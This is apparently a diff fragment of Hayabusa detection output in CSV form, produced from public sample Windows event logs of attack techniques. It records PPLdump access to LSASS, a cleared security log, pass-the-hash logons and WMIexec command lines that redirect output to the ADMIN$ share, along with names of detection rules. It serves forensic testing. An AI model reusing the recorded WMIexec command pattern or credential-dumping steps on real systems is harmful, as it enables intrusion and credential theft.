+2021-04-23 07:09:26.163 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\system32\services.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 7188 | Src PGUID: 747F3D96-F416-6081-0000-001033034A00 | Tgt PID: 652 | Tgt PGUID: 747F3D96-6E19-6082-0000-001070650000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx
+2021-04-23 07:09:26.163 +09:00,MSEDGEWIN10,10,high,CredAccess,Credentials Dumping Tools Accessing LSASS Memory,,rules/sigma/process_access/sysmon_cred_dump_lsass_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx
+2021-04-23 07:09:26.163 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\system32\services.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 7188 | Src PGUID: 747F3D96-F416-6081-0000-001033034A00 | Tgt PID: 652 | Tgt PGUID: 747F3D96-6E19-6082-0000-001070650000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx
+2021-04-23 07:09:26.307 +09:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\IEUser\Desktop\PPLdump.exe | PID: 6316 | PGUID: 747F3D96-F415-6081-0000-001040FE4900,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx
+2021-04-23 07:09:27.649 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\system32\csrss.exe | Tgt Process: C:\Windows\system32\DllHost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 424 | Src PGUID: 747F3D96-6E19-6082-0000-0010A5530000 | Tgt PID: 6972 | Tgt PGUID: 747F3D96-F417-6081-0000-0010661D4A00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx
+2021-04-23 07:09:27.653 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\system32\csrss.exe | Tgt Process: C:\Windows\system32\DllHost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 504 | Src PGUID: 747F3D96-6E19-6082-0000-0010E5580000 | Tgt PID: 6972 | Tgt PGUID: 747F3D96-F417-6081-0000-0010661D4A00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx
+2021-04-23 07:09:35.260 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\system32\lsass.exe | Tgt Process: C:\Windows\system32\services.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1000 | Src PID: 652 | Src PGUID: 747F3D96-6E19-6082-0000-001070650000 | Tgt PID: 624 | Tgt PGUID: 747F3D96-6E19-6082-0000-0010F6600000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx
+2021-04-23 07:09:35.284 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: ? | LID: 0x3e5 | PID: 6644 | PGUID: 747F3D96-F41F-6081-0000-001078834A00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx
+2021-04-23 07:09:35.284 +09:00,MSEDGEWIN10,1,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx
+2021-04-23 07:09:35.284 +09:00,MSEDGEWIN10,1,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx
+2021-04-23 07:09:35.284 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\system32\services.exe | Tgt Process: C:\Windows\system32\svchost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 624 | Src PGUID: 747F3D96-6E19-6082-0000-0010F6600000 | Tgt PID: 6644 | Tgt PGUID: 747F3D96-F41F-6081-0000-001078834A00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx
+2021-04-23 19:09:46.214 +09:00,srvdefender01.offsec.lan,2004,medium,,Added Rule in Windows Firewall with Advanced Security,,rules/sigma/builtin/firewall_as/win_firewall_as_add_rule.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:10:03.015 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x3cc | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-26 17:25:31.043 +09:00,srvdefender01.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:36.560 +09:00,srvdefender01.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x4da321f,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:36.560 +09:00,srvdefender01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:36.560 +09:00,srvdefender01.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:36.584 +09:00,srvdefender01.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x4da324f,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:36.584 +09:00,srvdefender01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.123.11 | LID: 0x4da324f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:36.686 +09:00,srvdefender01.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x4da3273,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:36.686 +09:00,srvdefender01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.123.11 | LID: 0x4da3273,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:36.852 +09:00,srvdefender01.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x4da3292,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:36.852 +09:00,srvdefender01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.123.11 | LID: 0x4da3292,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:36.913 +09:00,srvdefender01.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x4da32af,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:36.913 +09:00,srvdefender01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.123.11 | LID: 0x4da32af,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:37.258 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: cmd.exe /Q /c cd \ 1> \\127.0.0.1\ADMIN$\__1619425227.894209 2>&1 | Path: C:\Windows\System32\cmd.exe | PID: 0xd44 | User: SRVDEFENDER01$ | LID: 0x3e4,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:37.313 +09:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:37.325 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:37.329 +09:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:37.332 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:37.335 +09:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:37.338 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:37.342 +09:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:37.344 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:37.348 +09:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:37.350 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:37.354 +09:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:37.356 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:37.360 +09:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:37.363 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:37.367 +09:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:37.369 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:37.373 +09:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:37.375 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:37.379 +09:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:37.381 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:37.385 +09:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:37.385 +09:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 127.0.0.1 | LID: 0x4da32af,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:37.388 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:37.391 +09:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:37.392 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 127.0.0.1 | LID: 0x4da32af,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:37.392 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 127.0.0.1 | LID: 0x4da32af,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:37.394 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:37.399 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:38.406 +09:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:38.409 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:38.418 +09:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:38.420 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:38.435 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: cmd.exe /Q /c cd 1> \\127.0.0.1\ADMIN$\__1619425227.894209 2>&1 | Path: C:\Windows\System32\cmd.exe | PID: 0x1b98 | User: SRVDEFENDER01$ | LID: 0x3e4,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:38.450 +09:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:38.452 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:38.456 +09:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:38.458 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
